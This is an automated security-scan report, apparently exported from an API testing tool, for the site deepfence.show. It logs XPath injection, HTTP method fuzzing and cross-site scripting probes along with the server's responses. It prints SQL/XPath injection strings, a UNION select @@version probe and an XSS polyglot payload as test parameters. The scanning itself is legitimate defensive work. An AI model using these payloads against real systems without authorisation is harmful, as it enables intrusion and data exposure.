href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove XPath tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-643\nIssue Number #113\nScan XPath Injection\nSeverity ERROR\nEndpoint https://deepfence.show/Request GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# '%20o/**/r%201/0%20--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove XPath tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-643\nIssue Number #114\nScan XPath Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ' o/**/r 1/0 --\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...Alerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove XPath tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-643\nIssue Number #115\nScan XPath Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ;\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove XPath tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-643\nIssue Number #116\nScan XPath Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# '%20and%201=2%20--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove XPath tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-643\nIssue Number #117\nScan XPath Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ' and 1=2 --\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove XPath tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-643\nIssue Number #118\nScan XPath InjectionSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# test%20UNION%20select%201,%20@@version,%201,%\n201;\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove XPath tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-643\nIssue Number #119\nScan XPath Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# test UNION select 1, @@version, 1, 1;\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/z8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove XPath tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-643\nIssue Number #120\nHTTP Method Fuzzing\nAn HTTP Method Fuzzing Scan attempts to use other HTTP verbs (methods) than those defined in \nan API. For instance, if you have defined GET and POST, it will send requests using the DELETE \nand PUT verbs, expecting an appropriate HTTP error response and reporting alerts if it doesn't \nreceive it.\nSometimes, unexpected HTTP verbs can overwrite data on a server or get data that shouldn't be \nrevealed to clients.\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://deepfence.show/\nRequest COPY https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod COPY\nResponseContent-type: text/html; charset=utf-8\n603 Content length: \nFull response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> <script src=\"/cdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-\nrl81O2OQ.js\"></script><script async src='/cdn-cgi/bm/cv/669835187/api.js'>\n</script></head> <body> <pre>Cannot COPY /</pre> <script type=\"text/\njavascript\">(function(){window['__CF$cv$params']={r:'64092248d9f22133',m:'\n3931eeeaa297955c9ea52b77416f61e687a92280-1618531232-1800-Aa/K+XPI+\nHCAncD4JpCNRK3fIcgRtYc7wpIMyX+\nzchW1lzQP79ur8ZomCCcnLsjbcLuLMEjLXAGrXnNrtdoPc/+l0Gz2wCq75B3SA+/pcNYlvpfB1\n/J2Sm5PdWrsmpL83g==',s:[0xfadaddec53,0xc6e31769fb],}})();</script></body> \n</html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.COPY\nIssue Number #121\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://deepfence.show/Request UNLOCK https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod UNLOCK\nResponseContent-type: text/html; charset=utf-8\n605 Content length: \nFull response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> <script src=\"/cdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-\nrl81O2OQ.js\"></script><script async src='/cdn-cgi/bm/cv/669835187/api.js'>\n</script></head> <body> <pre>Cannot UNLOCK /</pre> <script type=\"text/\njavascript\">(function(){window['__CF$cv$params']={r:'6409224b2e512133',m:'\n6363a2f6e1e0d6012c4d7665fb991f8c4074ebf8-1618531232-1800-\nAZASBJuGeGLnbvS1zXKTgKp0GkWE+ENjWCyg3Ocev1QFywyaMR7u1vS/\n2PDudXLYrFfWsCoXlYAhzfiku9rQ6Z5ARr0qUaRSTiNrvGNRy5xioUIJRiW0DXbuCWpunzbxxQ\n==',s:[0x4132eec092,0xbc691b3044],}})();</script></body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource. UNLOCK\nIssue Number #122\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://deepfence.show/\nRequest LOCK https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod LOCK\nResponseContent-type: text/html; charset=utf-8\n603 Content length: \nFull response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> <script src=\"/cdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-\nrl81O2OQ.js\"></script><script async src='/cdn-cgi/bm/cv/669835187/api.js'>\n</script></head> <body> <pre>Cannot LOCK /</pre> <script type=\"text/\njavascript\">(function(){window['__CF$cv$params']={r:'6409224d4a182133',m:'\n850466a3ce12e71ce3a67c577020a274718431dd-1618531233-1800-AWh9xH+\ntBV5u3QQIF2aDttRmxPvYHh/yx9fF1Xgo3H2KEjg/94evh+z5a3b3NTWqHRe1HxOzpsb/\nu34K22rykFN5fXfhB1+TEO2o/wzHG95L+wrNSvYPrQ4S5T5T75rE0Q==',s:[\n0x88ea8322a7,0x515831038c],}})();</script></body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.LOCK\nIssue Number #123\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://deepfence.show/\nRequest PROPFIND https://deepfence.show/ HTTP/1.1\nTest Step GETModified \nParametersName Value\nmethod PROPFIND\nResponseContent-type: text/html; charset=utf-8\n607 Content length: \nFull response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> <script src=\"/cdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-\nrl81O2OQ.js\"></script><script async src='/cdn-cgi/bm/cv/669835187/api.js'>\n</script></head> <body> <pre>Cannot PROPFIND /</pre> <script type=\"text/\njavascript\">(function(){window['__CF$cv$params']={r:'6409224f8e922133',m:'\nb532dafd37005eba2e969148790b923900230320-1618531233-1800-\nAUVlevSjkCdst2y3NLOTCVbULWz1ah4TbfLmBzybUraJhwTwr1nqO2DUspqoiaIY6ujVZWSJ9R\nBMvmQKl1QF+3wGYAvByl5IIys42kflFDa3cWo14um8/KOLjwgNE+2VEg==',s:[\n0xc16b6ee63c,0xeb16087225],}})();</script></body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource. PROPFIND\nIssue Number #124\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://deepfence.show/\nRequest PATCH https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod PATCH\nResponseContent-type: text/html; charset=utf-8\n604 Content length: \nFull response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> <script src=\"/cdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-\nrl81O2OQ.js\"></script><script async src='/cdn-cgi/bm/cv/669835187/api.js'>\n</script></head> <body> <pre>Cannot PATCH /</pre> <script type=\"text/\njavascript\">(function(){window['__CF$cv$params']={r:'64092251cb1e2133',m:'\n3b226166ac3837b92db4fa8a6ce774ec717168e8-1618531233-1800-AS2o+\nCzgadItWnxCmKXwNuPq/P1Cfv/fem63I58AmDYxNdPgtXGOhG8gN6SiOoIlni3qq9BWRAvuU+\nsYp4vjkyevlMPhqwIThZGErGEhBQuz85glMfcJfUAep4CNn8LnxA==',s:[\n0x11ef069925,0x8cef9fe175],}})();</script></body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.PATCH\nIssue Number #125\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://deepfence.show/\nRequest OPTIONS https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Valuemethod OPTIONS\nResponseContent-type: text/plain\n2 Content length: \nFull response:\nok\nAlerts Valid HTTP Status Codes: Response status code: 200 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource. OPTIONS\nIssue Number #126\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://deepfence.show/\nRequest HEAD https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod HEAD\nResponse No content\nAlerts Valid HTTP Status Codes: Response status code: 200 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.HEAD\nIssue Number #127\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://deepfence.show/\nRequest DELETE https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod DELETE\nResponseContent-type: text/html; charset=utf-8\n605 Content length: \nFull response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> <script src=\"/cdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-\nrl81O2OQ.js\"></script><script async src='/cdn-cgi/bm/cv/669835187/api.js'>\n</script></head> <body> <pre>Cannot DELETE /</pre> <script type=\"text/\njavascript\">(function(){window['__CF$cv$params']={r:'6409225b391e9304',m:'\n3ceb574460e21ea436cd987db5bce8293111f2b5-1618531235-1800-Af1pE/\nzGtZFAhtkiM5kMZguJ+z/+w6dWLuXeqhJjGB4+BUCASehb+SBy+2ZSypZjRON+\nnnrCDphiKgVzyoIwg4jnUVSTUUPe3LX7e1PV+SsBHfEiaFw0hN/6Z8nWUlL9oA==',s:[\n0x4e5f63afff,0x528c4293b6],}})();</script></body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource. DELETE\nIssue Number #128Scan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://deepfence.show/\nRequest PUT https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod PUT\nResponseContent-type: text/html; charset=utf-8\n602 Content length: \nFull response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> <script src=\"/cdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-\nrl81O2OQ.js\"></script><script async src='/cdn-cgi/bm/cv/669835187/api.js'>\n</script></head> <body> <pre>Cannot PUT /</pre> <script type=\"text/\njavascript\">(function(){window['__CF$cv$params']={r:'6409225e0a819304',m:'\nd69e6b29239a6ae763df934aa44751e899bb3dc2-1618531235-1800-\nARCYhwuI3lAYftVCEf/\nzPlrGTKHoo82G2eAZPcoBr2qbkqhPMWkBdDu8b8INP6MTzuvZcpEphIaM22t1gW0MLOYsd0JFc\nRrLOxzkaDfm6Q8gRBMF+dmF9cevsqubsZCGog==',s:[0x3a01927ce3,0x076a9a063a],}})\n();</script></body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.PUT\nIssue Number #129\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://deepfence.show/\nRequest POST https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod POST\nResponseContent-type: text/html; charset=utf-8\n603 Content length: \nFull response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> <script src=\"/cdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-\nrl81O2OQ.js\"></script><script async src='/cdn-cgi/bm/cv/669835187/api.js'>\n</script></head> <body> <pre>Cannot POST /</pre> <script type=\"text/\njavascript\">(function(){window['__CF$cv$params']={r:'64092260cc129304',m:'\nb1d51c9d5b56c29a5732fcf89a42f363f830c9d7-1618531236-1800-\nAcnUwz5l5OLJZ775Yd3qf1458l2uDCo45Cl3mvl8fhhD475vvefOFajUE9VngdtcI9JP6Kplai\ncYLbYObV0/f0nEuexFtLKIco+0nQRPsgymj1nt50aan0EFJN0LegKqIw==',s:[\n0x6a168ab71c,0xaee68643c2],}})();</script></body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.POST\nIssue Number #130Cross Site Scripting\nA Cross-Site Scripting (XSS) Scan attacks clients of the system under test by inserting dynamic code \nlike JavaScript into the input, hoping that the same code is echoed in the response. \nHowever, this is only a problem if the response is consumed directly by a browser or if HTML is built \nin a naive way from the response. In other words, Cross-Site Scripting Scans may sometimes give \nyou false positives.\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io<PLAINTEXT>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io \nnot be echoed back in the response\nCWE-ID CWE-79\nIssue Number #131\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@ ';alert(String.fromCharCode(88,83,83))//\\';alert(deepfence.io String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(\n88,83,83))//\\\";alert(String.fromCharCode(88,83,83))//--></SCRIPT\n>\">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- 